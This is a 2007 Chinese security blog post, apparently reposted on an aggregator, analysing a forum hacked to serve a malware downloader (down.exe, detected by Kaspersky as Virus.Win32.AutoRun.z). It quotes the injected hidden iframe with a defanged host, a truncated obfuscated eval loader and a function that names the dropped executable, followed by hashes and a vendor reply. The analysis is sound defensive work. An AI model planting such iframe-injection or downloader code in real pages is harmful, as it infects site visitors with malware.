某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
来源:互联网 发布:数组的长度是什么意思 编辑:程序博客网 时间:2024/05/09 10:18
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
endurer 原创
2007-07-28 第2版 补充 Kaspersky 的回复
2007-07-28 第1版
打开该论坛中偶常去的版面,瑞星提示有可疑文件下载运行。
用Google搜索,果然Google已经标出来了:
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=%E8%BF%98%E7%8F%A0%E5%8C%BA+%E6%97%A7%E9%9B%A8%E6%A5%BC%E6%B8%85%E9%A3%8E%E9%98%81&meta=
检查网页代码,被加入:
/---
<iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1></iframe>
---/
hxxp://i**.x***in**8.info/wm.htm 包含代码:
/---
<script src=0614.js></script>
---/
hxxp://i**.x***in**8.info/0614.js 内容为:
/---
eval("/146/165/156/143/…(略)…/146/75/61/73/175")
---/
经过2次解密,得到原始代码,功能是下载 down.exe,保存到%windir%下,文件名由自定义函数:
/---
function QK45u3(rm4mf){var m0qNW = window[“Math”][“random”]()*rm4mf;return Math[“round”](m0qNW)+‘.exe’;}
---/
即***.exe,其中*为数字,接着通过cmd.exe /c 来运行。
文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-28 15:2:29
修改时间 : 2007-7-28 15:2:29
访问时间 : 2007-7-28 15:3:29
大小 : 19602 字节 19.146 KB
MD5 : a329a121353d80b9871119788f7b14c7
nSPack 1.3 -> North Star/Liu Xing Ping
当前状态: 完成
附加信息
File size: 19602 bytes
MD5: a329a121353d80b9871119788f7b14c7
SHA1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=CBB0E79992C2FA964C9000F9F5065B00EFB6D5A7
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
主 题: RE: [KLAB-2516758] 发件人: "" <newvirus@kaspersky.com> 发送时间:2007-07-28 16:16:38 Hello.
Virus.Win32.AutoRun.z
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.
- 某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
- 遭遇Trojan-PSW.Win32.OnLineGames,Trojan.PSW.Win32.Agent,Virus.Win32.AutoRun.er等/v2
- 某VIP会员站被挂马 Trojan.Win32.Agent.vty/ down.exe
- 某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
- 病毒 Virus.Win32.Autorun修改系统时间
- 某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
- 抓到通过U盘传播的 Virus.Win32.AutoRun.ab/Worm.Win32.Agent.zhw/setup.exe
- 某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
- 遭遇Trojan.DL.Win32.Autorun.yuz,Trojan.Win32.Inject.gh,Trojan.Win32.Agent.zsq等
- ARP病毒传播Virus.Win32.AutoRun.bx,Virus.Win32.AutoRun.bv
- ARP病毒传播Virus.Win32.AutoRun.bx,Virus.Win32.AutoRun.bv
- 某论坛挂马Worm.Win32.Autorun.eyh
- 某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
- 01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
- 360卫士报 comres.dll 为 Win32.Trojan.PWS.a.rgrk
- Xiaohao.exe(Virus.Win32.Agent.o)
- 传播Virus.Win32.AutoRun.f/Worm.Win32.Delf.b的网页
- 某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
- Thinkpad T60
- 【原创】迅雷5(Thunder)中如何备份下载文件列表
- MatchData#pre_match
- 我的技术博客
- 简单的jpeg编码程序
- 某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
- 星期算法
- MatchData#post_match
- 简单的JPEG解码程序
- JPEG文件编/解码详解
- 23种经典设计模式的java实现_5_职责链模式
- C# 编程感悟
- Google聘用澳大利亚大学生开发新搜索技术(转载)
- C语言文件操作